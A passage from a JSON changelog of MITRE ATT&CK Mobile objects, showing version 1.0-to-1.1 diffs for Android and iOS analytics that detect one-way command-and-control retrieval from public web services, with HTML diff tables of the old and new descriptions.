class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">,&nbsp;or&nbsp;appears&nbsp;tied&nbsp;to&nbsp;command&nbsp;delivery&nbsp;or&nbsp;output&nbsp;exfiltration</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">level&nbsp;OS&nbsp;APIs&nbsp;integrations&nbsp;may&nbsp;have&nbsp;access&nbsp;to&nbsp;newly&nbsp;created&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">.&nbsp;Because&nbsp;direct&nbsp;Unix-shell&nbsp;observability&nbsp;is&nbsp;typically&nbsp;weake</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">processes&nbsp;and&nbsp;their&nbsp;parameters,&nbsp;potentially&nbsp;detecting&nbsp;unwant</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">r&nbsp;on&nbsp;iOS&nbsp;and&nbsp;child&nbsp;processes&nbsp;remain&nbsp;constrained&nbsp;by&nbsp;the&nbsp;app&nbsp;s</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ed&nbsp;or&nbsp;malicious&nbsp;shells.&nbsp;Application&nbsp;vetting&nbsp;services&nbsp;could&nbsp;d</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">andbox,&nbsp;the&nbsp;analytic&nbsp;anchors&nbsp;on&nbsp;process-execution&nbsp;effects&nbsp;wh</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">etect&nbsp;the&nbsp;invocations&nbsp;of&nbsp;methods&nbsp;that&nbsp;could&nbsp;be&nbsp;used&nbsp;to&nbsp;execu</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ere&nbsp;available&nbsp;and&nbsp;then&nbsp;on&nbsp;lifecycle,&nbsp;file,&nbsp;and&nbsp;network&nbsp;side&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">te&nbsp;shell&nbsp;commands.(Citation:&nbsp;Samsung&nbsp;Knox&nbsp;Mobile&nbsp;Threat&nbsp;Defe</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">effects&nbsp;rather&nbsp;than&nbsp;assuming&nbsp;rich&nbsp;shell-parameter&nbsp;visibility</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">nse)&nbsp;Mobile&nbsp;Threat&nbsp;Defense&nbsp;(MTD)&nbsp;with&nbsp;lower-level&nbsp;OS&nbsp;APIs&nbsp;in</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;in&nbsp;all&nbsp;environments.</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">tegrations&nbsp;may&nbsp;have&nbsp;access&nbsp;to&nbsp;running&nbsp;processes&nbsp;and&nbsp;their&nbsp;pa</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">rameters,&nbsp;potentially&nbsp;detecting&nbsp;unwanted&nbsp;or&nbsp;malicious&nbsp;shells</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--ddebe043-2017-44ba-96e5-cbe87916511b",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-19 15:15:16.075000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0610#AN1663",
                            "external_id": "AN1663"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1663",
                    "description": "The defender correlates repeated or periodic app-attributed retrieval from a legitimate public web-service platform with runtime conditions showing that the retrieval is not aligned to normal foreground consumption, user interaction, or approved app role. The strongest Android evidence is a managed or installed app repeatedly issuing inbound-oriented GET, fetch, sync, or content-pull operations to social, collaboration, paste, code-hosting, cloud-storage, messaging, or generic HTTPS platforms while the app is backgrounded, while the device is locked, or without recent user interaction, and without a corresponding outbound writeback to that same service class during the operational window. The detection is strengthened when the retrieval is temporally adjacent to scheduled/background execution, local state changes, or later downstream effects that do not require the same public platform to receive output.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "VPN:MobileProxy",
                            "channel": "App-attributed HTTP GET, content fetch, sync pull, or inbound-oriented HTTPS session to public web-service domain recurred within TimeWindow without app-attributed POST, PUT, PATCH, upload, comment, message send, or API write to same service class"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "VPN:MobileProxy",
                            "channel": "Repeated app-attributed retrieval from same public web-service domain or API endpoint occurred at stable recurrence interval with low outbound volume relative to inbound content"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "VPN:MobileProxy",
                            "channel": "Inbound content retrieval from public web-service domain occurred without subsequent writeback to same service class and was followed by local or downstream activity outside normal app sync profile"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "AppState=background when repeated retrieval from public web-service domain began and no foreground transition occurred during the retrieval sequence"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "DeviceLockState=locked during repeated inbound retrieval sequence from public web-service platform"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "LastUserInteractionDelta exceeded threshold before repeated retrieval sequence from public web-service domain from same app identity"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "App identity performing repeated one-way retrieval was unmanaged, outside approved app baseline, or not permitted to use detected public web-service class for background content retrieval"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window used to evaluate recurring retrieval and absence of same-service writeback."
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Approved app identities vary by organization, role, and device group."
                        },
                        {
                            "field": "AllowedServiceClasses",
                            "description": "Some apps legitimately retrieve content from collaboration, messaging, storage, or code-hosting services."
                        },
                        {
                            "field": "AllowedReadOnlyMappings",
                            "description": "Defines which apps are expected to only retrieve, and under what foreground/background conditions."
                        },
                        {
                            "field": "RecentUserInteractionWindow",
                            "description": "Defines how close retrieval must be to user activity to be considered expected"
                        },
                        {
                            "field": "BeaconIntervalTolerance",
                            "description": "Allowed recurrence interval for benign refresh, sync, or polling behavior differs by app category"
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Some apps should only retrieve from certain public service classes while foregrounded"
                        },
                        {
                            "field": "InboundOutboundRatioThreshold",
                            "description": "Expected ratio of inbound to outbound bytes for benign app refresh behavior varies by workload."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window used to evaluate recurring retrieval and absence of same-service writeback.\"}, {\"field\": \"AllowedAppList\", \"description\": \"Approved app identities vary by organization, role, and device group.\"}, {\"field\": \"AllowedServiceClasses\", \"description\": \"Some apps legitimately retrieve content from collaboration, messaging, storage, or code-hosting services.\"}, {\"field\": \"AllowedReadOnlyMappings\", \"description\": \"Defines which apps are expected to only retrieve, and under what foreground/background conditions.\"}, {\"field\": \"RecentUserInteractionWindow\", \"description\": \"Defines how close retrieval must be to user activity to be considered expected\"}, {\"field\": \"BeaconIntervalTolerance\", \"description\": \"Allowed recurrence interval for benign refresh, sync, or polling behavior differs by app category\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Some apps should only retrieve from certain public service classes while foregrounded\"}, {\"field\": \"InboundOutboundRatioThreshold\", \"description\": \"Expected ratio of inbound to outbound bytes for benign app refresh behavior varies by workload.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-19 15:15:16.075000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"The defender correlates repeated or periodic app-attributed retrieval from a legitimate public web-service platform with runtime conditions showing that the retrieval is not aligned to normal foreground consumption, user interaction, or approved app role. The strongest Android evidence is a managed or installed app repeatedly issuing inbound-oriented GET, fetch, sync, or content-pull operations to social, collaboration, paste, code-hosting, cloud-storage, messaging, or generic HTTPS platforms while the app is backgrounded, while the device is locked, or without recent user interaction, and without a corresponding outbound writeback to that same service class during the operational window. The detection is strengthened when the retrieval is temporally adjacent to scheduled/background execution, local state changes, or later downstream effects that do not require the same public platform to receive output.\", \"old_value\": \"Application vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application.\\nMany properly configured firewalls may naturally block one-way command and control traffic.\", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-Application vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application.\\n-Many properly configured firewalls may naturally block one-way command and control traffic.\\n+The defender correlates repeated or periodic app-attributed retrieval from a legitimate public web-service platform with runtime conditions showing that the retrieval is not aligned to normal foreground consumption, user interaction, or approved app role. The strongest Android evidence is a managed or installed app repeatedly issuing inbound-oriented GET, fetch, sync, or content-pull operations to social, collaboration, paste, code-hosting, cloud-storage, messaging, or generic HTTPS platforms while the app is backgrounded, while the device is locked, or without recent user interaction, and without a corresponding outbound writeback to that same service class during the operational window. The detection is strengthened when the retrieval is temporally adjacent to scheduled/background execution, local state changes, or later downstream effects that do not require the same public platform to receive output.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"VPN:MobileProxy\", \"channel\": \"App-attributed HTTP GET, content fetch, sync pull, or inbound-oriented HTTPS session to public web-service domain recurred within TimeWindow without app-attributed POST, PUT, PATCH, upload, comment, message send, or API write to same service class\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"VPN:MobileProxy\", \"channel\": \"Repeated app-attributed retrieval from same public web-service domain or API endpoint occurred at stable recurrence interval with low outbound volume relative to inbound content\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba\", \"name\": \"Network Traffic\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"VPN:MobileProxy\", \"channel\": \"Inbound content retrieval from public web-service domain occurred without subsequent writeback to same service class and was followed by local or downstream activity outside normal app sync profile\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"AppState=background when repeated retrieval from public web-service domain began and no foreground transition occurred during the retrieval sequence\"}, \"root['x_mitre_log_source_references'][4]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"DeviceLockState=locked during repeated inbound retrieval sequence from public web-service platform\"}, \"root['x_mitre_log_source_references'][5]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"LastUserInteractionDelta exceeded threshold before repeated retrieval sequence from public web-service domain from same app identity\"}, \"root['x_mitre_log_source_references'][6]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"App identity performing repeated one-way retrieval was unmanaged, outside approved app baseline, or not permitted to use detected public web-service class for background content retrieval\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to122__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to122__0\"><a href=\"#difflib_chg_to122__top\">t</a></td><td class=\"diff_header\" id=\"from122_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Application&nbsp;vetting&nbsp;services&nbsp;may&nbsp;provide&nbsp;a&nbsp;list&nbsp;of&nbsp;connectio</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to122__top\">t</a></td><td class=\"diff_header\" id=\"to122_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">The&nbsp;defender&nbsp;correlates&nbsp;repeated&nbsp;or&nbsp;periodic&nbsp;app-attributed&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ns&nbsp;made&nbsp;or&nbsp;received&nbsp;by&nbsp;an&nbsp;application,&nbsp;or&nbsp;a&nbsp;list&nbsp;of&nbsp;domains&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">retrieval&nbsp;from&nbsp;a&nbsp;legitimate&nbsp;public&nbsp;web-service&nbsp;platform&nbsp;with</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">contacted&nbsp;by&nbsp;the&nbsp;application.&nbsp;Many&nbsp;properly&nbsp;configured&nbsp;firew</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;runtime&nbsp;conditions&nbsp;showing&nbsp;that&nbsp;the&nbsp;retrieval&nbsp;is&nbsp;not&nbsp;aligne</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">alls&nbsp;may&nbsp;naturally&nbsp;block&nbsp;one-way&nbsp;command&nbsp;and&nbsp;control&nbsp;traffic</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">d&nbsp;to&nbsp;normal&nbsp;foreground&nbsp;consumption,&nbsp;user&nbsp;interaction,&nbsp;or&nbsp;app</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">roved&nbsp;app&nbsp;role.&nbsp;The&nbsp;strongest&nbsp;Android&nbsp;evidence&nbsp;is&nbsp;a&nbsp;managed&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">or&nbsp;installed&nbsp;app&nbsp;repeatedly&nbsp;issuing&nbsp;inbound-oriented&nbsp;GET,&nbsp;fe</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tch,&nbsp;sync,&nbsp;or&nbsp;content-pull&nbsp;operations&nbsp;to&nbsp;social,&nbsp;collaborati</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">on,&nbsp;paste,&nbsp;code-hosting,&nbsp;cloud-storage,&nbsp;messaging,&nbsp;or&nbsp;generi</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">c&nbsp;HTTPS&nbsp;platforms&nbsp;while&nbsp;the&nbsp;app&nbsp;is&nbsp;backgrounded,&nbsp;while&nbsp;the&nbsp;d</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">evice&nbsp;is&nbsp;locked,&nbsp;or&nbsp;without&nbsp;recent&nbsp;user&nbsp;interaction,&nbsp;and&nbsp;wit</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">hout&nbsp;a&nbsp;corresponding&nbsp;outbound&nbsp;writeback&nbsp;to&nbsp;that&nbsp;same&nbsp;service</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;class&nbsp;during&nbsp;the&nbsp;operational&nbsp;window.&nbsp;The&nbsp;detection&nbsp;is&nbsp;stren</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">gthened&nbsp;when&nbsp;the&nbsp;retrieval&nbsp;is&nbsp;temporally&nbsp;adjacent&nbsp;to&nbsp;schedul</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ed/background&nbsp;execution,&nbsp;local&nbsp;state&nbsp;changes,&nbsp;or&nbsp;later&nbsp;downs</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tream&nbsp;effects&nbsp;that&nbsp;do&nbsp;not&nbsp;require&nbsp;the&nbsp;same&nbsp;public&nbsp;platform&nbsp;t</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">o&nbsp;receive&nbsp;output.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--dec6e0d3-f4ae-48ed-90b9-ee32fd7e8dc6",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-19 15:26:39.271000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0610#AN1664",
                            "external_id": "AN1664"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1664",
                    "description": "The defender correlates repeated retrieval-oriented communication from a supervised device or managed iOS app to a legitimate public web-service platform where the activity remains primarily inbound and does not produce corresponding writeback to that same service class during the operational window. The strongest iOS evidence is managed-app or device-attributed communication to collaboration, social, messaging, storage, or generic HTTPS platforms where inbound fetches or content pulls recur during background refresh, while the device is locked, or without recent user interaction, and no matching POST, upload, update, or message-send activity to that same public service class is observed. Because direct local runtime visibility is weaker than Android, the primary analytic is anchored on network directionality plus supervised managed-app and device-state context.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "VPN:MobileProxy",
                            "channel": "App-attributed HTTP GET, content fetch, sync pull, or inbound-oriented HTTPS session to public web-service domain recurred within TimeWindow without app-attributed POST, PUT, PATCH, upload, comment, message send, or API write to same service class"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "VPN:MobileProxy",
                            "channel": "Repeated app-attributed retrieval from same public web-service domain or API endpoint occurred at stable recurrence interval with low outbound volume relative to inbound content"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "VPN:MobileProxy",
                            "channel": "Inbound content retrieval from public web-service domain occurred without subsequent writeback to same service class and was followed by local or downstream activity outside normal app sync profile"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "DeviceLockState=locked during repeated inbound retrieval sequence from public web-service platform"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "LastUserInteractionDelta exceeded threshold before repeated retrieval sequence from public web-service domain from same app identity"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "iOS:MDMLog",
                            "channel": "Bundle performing repeated one-way retrieval was not present in approved managed-app baseline or was not permitted to use detected public web-service class for background content retrieval"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window used to evaluate recurring retrieval and absence of same-service writeback."
                        },
                        {
                            "field": "SupervisedRequired",
                            "description": "Strongest app-governance and bundle-baseline analytics depend on supervised iOS devices."
                        },
                        {
                            "field": "AllowedManagedApps",
                            "description": "Approved managed bundle identities vary by organization and device profile."
                        },
                        {
                            "field": "AllowedServiceClasses",
                            "description": "Some managed apps legitimately retrieve content from storage, collaboration, or messaging services."
                        },
                        {
                            "field": "AllowedReadOnlyMappings",
                            "description": "Defines which bundles are expected to retrieve without writeback, and in what context."
                        },
                        {
                            "field": "BackgroundRefreshBaseline",
                            "description": "Expected background retrieval behavior differs across managed app categories."
                        },
                        {
                            "field": "RecentUserInteractionWindow",
                            "description": "Defines how close retrieval must be to user activity to be considered expected."
                        },
                        {
                            "field": "BeaconIntervalTolerance",
                            "description": "Allowed recurrence interval for benign refresh, polling, or sync behavior differs by bundle type."
                        },
                        {
                            "field": "InboundOutboundRatioThreshold",
                            "description": "Expected ratio of inbound to outbound bytes for benign managed-app refresh behavior varies by workflow."
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window used to evaluate recurring retrieval and absence of same-service writeback.\"}, {\"field\": \"SupervisedRequired\", \"description\": \"Strongest app-governance and bundle-baseline analytics depend on supervised iOS devices.\"}, {\"field\": \"AllowedManagedApps\", \"description\": \"Approved managed bundle identities vary by organization and device profile.\"}, {\"field\": \"AllowedServiceClasses\", \"description\": \"Some managed apps legitimately retrieve content from storage, collaboration, or messaging services.\"}, {\"field\": \"AllowedReadOnlyMappings\", \"description\": \"Defines which bundles are expected to retrieve without writeback, and in what context.\"}, {\"field\": \"BackgroundRefreshBaseline\", \"description\": \"Expected background retrieval behavior differs across managed app categories.\"}, {\"field\": \"RecentUserInteractionWindow\", \"description\": \"Defines how close retrieval must be to user activity to be considered expected.\"}, {\"field\": \"BeaconIntervalTolerance\", \"description\": \"Allowed recurrence interval for benign refresh, polling, or sync behavior differs by bundle type.\"}, {\"field\": \"InboundOutboundRatioThreshold\", \"description\": \"Expected ratio of inbound to outbound bytes for benign managed-app refresh behavior varies by workflow.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-19 15:26:39.271000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"The defender correlates repeated retrieval-oriented communication from a supervised device or managed iOS app to a legitimate public web-service platform where the activity remains primarily inbound and does not produce corresponding writeback to that same service class during the operational window. The strongest iOS evidence is managed-app or device-attributed communication to collaboration, social, messaging, storage, or generic HTTPS platforms where inbound fetches or content pulls recur during background refresh, while the device is locked, or without recent user interaction, and no matching POST, upload, update, or message-send activity to that same public service class is observed. Because direct local runtime visibility is weaker than Android, the primary analytic is anchored on network directionality plus supervised managed-app and device-state context.\", \"old_value\": \"Application vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application.\\nMany properly configured firewalls may naturally block one-way command and control traffic.\", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-Application vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application.\\n-Many properly configured firewalls may naturally block one-way command and control traffic.\\n+The defender correlates repeated retrieval-oriented communication from a supervised device or managed iOS app to a legitimate public web-service platform where the activity remains primarily inbound and does not produce corresponding writeback to that same service class during the operational window. The strongest iOS evidence is managed-app or device-attributed communication to collaboration, social, messaging, storage, or generic HTTPS platforms where inbound fetches or content pulls recur during background refresh, while the device is locked, or without recent user interaction, and no matching POST, upload, update, or message-send activity to that same public service class is observed. Because direct local runtime visibility is weaker than Android, the primary analytic is anchored on network directionality plus supervised managed-app and device-state context.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"VPN:MobileProxy\", \"channel\": \"App-attributed HTTP GET, content fetch, sync pull, or inbound-oriented HTTPS session to public web-service domain recurred within TimeWindow without app-attributed POST, PUT, PATCH, upload, comment, message send, or API write to same service class\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"VPN:MobileProxy\", \"channel\": \"Repeated app-attributed retrieval from same public web-service domain or API endpoint occurred at stable recurrence interval with low outbound volume relative to inbound content\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba\", \"name\": \"Network Traffic\", \"channel\": 